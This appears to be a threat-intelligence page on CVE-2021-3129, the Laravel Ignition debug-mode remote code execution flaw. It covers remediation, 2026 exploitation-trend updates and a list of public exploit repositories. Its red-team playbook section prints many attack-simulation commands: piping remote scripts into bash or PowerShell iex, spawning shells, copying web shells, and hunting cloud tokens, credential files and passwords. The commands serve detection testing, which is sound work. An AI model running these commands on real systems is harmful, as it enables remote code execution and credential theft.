CVE-2021-3129
Overview
This vulnerability is a remote code execution flaw caused by insecure handling of file operations within the Ignition error handling package used by Laravel. Specifically, the use of file_get_contents() and file_put_contents() functions without proper input validation allows untrusted input to be processed. The flaw manifests in the debug mode feature of Laravel applications prior to version 8.4.2 when interacting with Ignition versions before 2.5.2, exposing the file handling component to exploitation.
Vulnerability Description
Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
Impact
An attacker can execute arbitrary code remotely without authentication or user interaction by exploiting this vulnerability. This enables full system compromise, including unauthorized access, data theft, and potential lateral movement within the affected environment. The exploitation requires only that the Laravel application runs in debug mode with vulnerable Ignition and Laravel versions, a common configuration in development or staging environments but sometimes present in production.
Solution
Upgrade Ignition to version 2.5.2 or later and Laravel to version 8.4.2 or later to address this vulnerability. The Ignition GitHub repository pull request #334 contains the relevant fix, and detailed patch instructions are available in Laravel's official release notes. Disabling debug mode in production environments is recommended as a temporary mitigation. Refer to https://github.com/facade/ignition/pull/334 and https://github.com/laravel/framework/releases/tag/v8.4.2 for specific remediation steps.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question arises from the insecure handling of file operations within the Ignition debugging tool, which is commonly utilized in Laravel applications. Specifically, the issue stems from the improper usage of functions such as file_get_contents() and file_put_contents(). When debug mode is enabled, these functions can be exploited by unauthenticated remote attackers to execute arbitrary code on the server. This is particularly concerning for applications that do not enforce strict access controls, as it allows attackers to manipulate files on the server, potentially leading to a complete compromise of the application and its underlying infrastructure.
Attack vectors for this vulnerability are primarily centered around web applications that have debug mode enabled. An attacker can craft a malicious request that leverages the vulnerable functions to read sensitive files or write malicious scripts to the server. For instance, if an attacker can control the input to file_get_contents(), they could read configuration files containing sensitive information such as database credentials. Furthermore, by exploiting file_put_contents(), an attacker could upload a backdoor or other malicious payload, allowing them to execute arbitrary code at will. This exploitation can occur without any prior authentication, making it particularly dangerous for applications that do not implement robust security measures.
The real-world impact of this vulnerability can be significant, especially for businesses that rely on Laravel for their web applications. The potential for unauthorized code execution can lead to data breaches, loss of customer trust, and significant financial repercussions. Organizations may face legal liabilities if sensitive data is compromised, and the costs associated with incident response, remediation, and public relations efforts can be substantial. Additionally, the reputation of the affected organization can suffer long-term damage, as customers may be hesitant to engage with a business that has experienced a security breach.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. First and foremost, it is crucial to ensure that debug mode is disabled in production environments. Regularly reviewing and updating dependencies, including the Ignition tool and Laravel framework, is essential to protect against known vulnerabilities. Implementing strict input validation and sanitization can help prevent attackers from injecting malicious payloads into file operations. Furthermore, employing web application firewalls (WAFs) can provide an additional layer of security by monitoring and filtering incoming traffic for suspicious activity.
In conclusion, the vulnerability associated with the Ignition debugging tool poses a serious threat to Laravel applications, particularly when debug mode is enabled. The ability for unauthenticated attackers to execute arbitrary code can lead to severe consequences for organizations, including data breaches and reputational damage. By implementing effective detection and mitigation strategies, businesses can significantly reduce their risk exposure and protect their applications from exploitation. Continuous monitoring and updating of security practices are essential in maintaining a robust security posture against evolving threats.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-3129, indicating persistent adversary interest despite the vulnerability’s age. Our telemetry shows that attackers continue to leverage publicly available proof-of-concept exploits, maintaining steady activity levels without a rapid surge. The presence of this vulnerability in ransomware campaigns underscores its ongoing operational relevance, particularly against Laravel applications with debug mode enabled. While the overall threat landscape remains stable, this sustained exploitation activity reinforces the criticality of timely patching and vigilant monitoring. Defenders should remain aware that adversaries are actively exploiting this flaw in the wild, which sustains its high-risk profile within the current threat environment.
Update 2 — July 03, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-3129, reflecting increased adversary interest in leveraging this critical Laravel Ignition vulnerability. Our telemetry indicates a consistent upward trend in attack activity, underscoring that threat actors continue to prioritize this vector, particularly within environments where debug mode remains enabled. The persistence of publicly available, user-friendly proof-of-concept exploits facilitates broader attacker adoption, while ongoing use in ransomware campaigns highlights the vulnerability’s operational utility for initial access and lateral movement. Although the EPSS score remains near maximum and stable, the observed surge in exploitation attempts elevates the immediate risk posture. Defenders should interpret this as a signal that exploitation is intensifying, reinforcing the vulnerability’s status as a high-priority threat requiring sustained vigilance.
Update 3 — July 22, 2026
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of new proof-of-concept tools that streamline attack execution. This development signals an ongoing refinement and wider dissemination of exploitation capabilities within the attacker community. The availability of more user-friendly exploit variants lowers the barrier to entry for less sophisticated threat actors, potentially broadening the pool of adversaries leveraging this vulnerability. Additionally, the persistence of ransomware groups employing this exploit underscores its continued operational relevance for initial access and lateral movement. While the overall exploit probability score remains near its peak, the incremental uptick in activity and expanded exploit toolkit collectively elevate the threat environment. Defenders should recognize this as an indication that adversaries are actively enhancing their exploitation methods, thereby sustaining the vulnerability’s critical risk profile.
Update 4 — August 05, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of additional publicly available proof-of-concept exploits that enhance attacker accessibility and automation. This surge reflects increased adversary interest and operational activity, particularly among ransomware-affiliated groups that continue to leverage this vulnerability for initial access and lateral movement within compromised environments. Although the EPSS score remains near its historical peak, the qualitative increase in telemetry signals a sustained and possibly expanding threat actor engagement. For defenders, this heightened activity underscores the necessity of maintaining vigilant monitoring and reinforces the criticality of timely patching and configuration management to mitigate exploitation risks. The evolving exploit landscape, characterized by more user-friendly and automated tools, further elevates the threat level by lowering the technical barrier for exploitation, thereby broadening the pool of potential attackers.
Update 5 — August 20, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2021-3129, accompanied by the emergence of several new proof-of-concept tools that simplify attack execution. This development indicates that threat actors are increasingly leveraging automated and publicly available resources to exploit Laravel Ignition instances operating in debug mode. Notably, ransomware groups have been observed incorporating this vulnerability into their attack chains, heightening the risk of impactful compromise. Although the EPSS score remains stable near its peak, the qualitative surge in telemetry and expanded exploit toolkit signify an elevated threat environment. For defenders, this evolution underscores a growing likelihood of opportunistic exploitation, particularly in environments where patching and debug mode configurations remain unaddressed. Consequently, the threat level associated with CVE-2021-3129 should be considered heightened due to increased adversary engagement and lowered exploitation barriers.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Facade | Ignition | All |
cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Unauthenticated remote code execution in Ignition
exploits/multi/php/ignition_laravel_debug_rce
|
- | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Laravel 8.4.2 debug mode - Remote code execution | SunCSR Team | webapps | php | - | View |
GitHub PoCs (35)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ambionics/laravel-exploits
Exploit for CVE-2021-3129
|
ambionics | 289 | 69 | 2021-01-13 | View |
|
zhzyker/CVE-2021-3129
Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
|
zhzyker | 163 | 55 | 2021-02-18 | View |
|
SNCKER/CVE-2021-3129
Laravel debug rce
|
SNCKER | 135 | 50 | 2021-01-22 | View |
|
joshuavanderpoll/CVE-2021-3129
Laravel RCE Exploit PoC - CVE-2021-3129 (user-friendly with automatic log path detection)
|
joshuavanderpoll | 153 | 26 | 2022-04-16 | View |
|
SecPros-Team/laravel-CVE-2021-3129-EXP
|
SecPros-Team | 78 | 30 | 2021-01-25 | View |
|
nth347/CVE-2021-3129_exploit
Exploit for CVE-2021-3129
|
nth347 | 69 | 27 | 2021-01-27 | View |
|
crisprss/Laravel_CVE-2021-3129_EXP
|
crisprss | 18 | 7 | 2021-01-27 | View |
|
knqyf263/CVE-2021-3129
PoC for CVE-2021-3129 (Laravel)
|
knqyf263 | 12 | 3 | 2021-10-01 | View |
|
ajisai-babu/CVE-2021-3129-exp
Laravel Debug mode RCE漏洞(CVE-2021-3129)poc / exp
|
ajisai-babu | 13 | 1 | 2023-03-04 | View |
|
0x0d3ad/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
|
0x0d3ad | 10 | 1 | 2024-09-29 | View |
|
Y0s9/CVE-2021-3129
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞
|
Y0s9 | 0 | 9 | 2021-04-11 | View |
|
cuongtop4598/CVE-2021-3129-Script
Add revert shell
|
cuongtop4598 | 7 | 1 | 2022-04-08 | View |
|
FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129
|
FunPhishing | 2 | 6 | 2021-02-14 | View |
|
MadExploits/Laravel-debug-Checker
CVE-2021-3129 Exploit Checker By ./MrMad
|
MadExploits | 7 | 1 | 2022-12-10 | View |
|
0nion1/CVE-2021-3129
CVE-2021-3129-Laravel Debug mode
|
0nion1 | 6 | 1 | 2022-10-11 | View |
|
Axianke/CVE-2021-3129
CVE-2021-3129
|
Axianke | 5 | 0 | 2024-01-15 | View |
|
shadowabi/Laravel-CVE-2021-3129
CVE-2021-3129 POC
|
shadowabi | 5 | 0 | 2022-06-04 | View |
|
wmasday/CVE-2021-3129
CVE-2021-3129 | Laravel Debug Mode Vulnerability
|
wmasday | 2 | 1 | 2023-07-27 | View |
|
idea-oss/laravel-CVE-2021-3129-EXP
|
idea-oss | 1 | 2 | 2021-07-22 | View |
|
lukwagoasuman/CVE-2021-3129---Laravel-RCE
## About The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability.<br> This script allows y...
|
lukwagoasuman | 1 | 1 | 2025-01-30 | View |
|
keyuan15/CVE-2021-3129
Laravel RCE CVE-2021-3129
|
keyuan15 | 1 | 0 | 2023-03-11 | View |
|
Prabesh01/hoh4
Modified version of laravel ignition RCE (CVE-2021-3129) exploit script for Hour of Hack Session-4
|
Prabesh01 | 0 | 1 | 2024-12-04 | View |
|
miko550/CVE-2021-3129
Laravel RCE (CVE-2021-3129)
|
miko550 | 0 | 1 | 2023-07-26 | View |
|
Giangdurian/CVE-2021-3129
|
Giangdurian | 0 | 0 | 2026-08-07 | View |
|
theNareshofficial/CVE-2021-3129-Lab
CVE-2021-3129: Laravel Debug Mode RCE - Complete exploitation lab with Python exploit, Docker container, and security a...
|
theNareshofficial | 0 | 0 | 2026-07-18 | View |
|
M4rrow/CVE-2021-3129-EXP
Laravel RCE Exploit PoC - CVE-2021-3129 (user-friendly with automatic log path detection)
|
M4rrow | 0 | 0 | 2026-05-12 | View |
|
M4rrow/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
|
M4rrow | 0 | 0 | 2026-04-14 | View |
|
Nullsecur1ty/CVE-2021-3129
CVE-2021-3129 (Laravel Ignition RCE Exploit)
|
Nullsecur1ty | 0 | 0 | 2026-02-20 | View |
|
GodOfServer/CVE-2021-3129
|
GodOfServer | 0 | 0 | 2024-10-31 | View |
|
Zoo1sondv/CVE-2021-3129
|
Zoo1sondv | 0 | 0 | 2023-05-01 | View |
|
piperpwn/CVE-2021-3129-piperpwn
Laravel Debug Mode and Payload
|
piperpwn | 0 | 0 | 2024-07-16 | View |
|
banyaksepuh/Mass-CVE-2021-3129-Scanner
|
banyaksepuh | 0 | 0 | 2023-10-22 | View |
|
cc3305/CVE-2021-3129
A exploit script for CVE-2021-3129
|
cc3305 | 0 | 0 | 2024-05-19 | View |
|
hupe1980/CVE-2021-3129
Laravel debug mode - Remote Code Execution (RCE)
|
hupe1980 | 0 | 0 | 2022-09-30 | View |
|
qaisarafridi/cve-2021-3129
|
qaisarafridi | 0 | 0 | 2023-04-06 | View |
Threat Feed
33 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-3129 |
| ambionics.io |
GitHub CVE
x_refsource_MISC
|
https://www.ambionics.io/blog/laravel-debug-rce |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/facade/ignition/pull/334 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/162094/Ignition-2.5.1-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/165999/Ignition-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-3129 |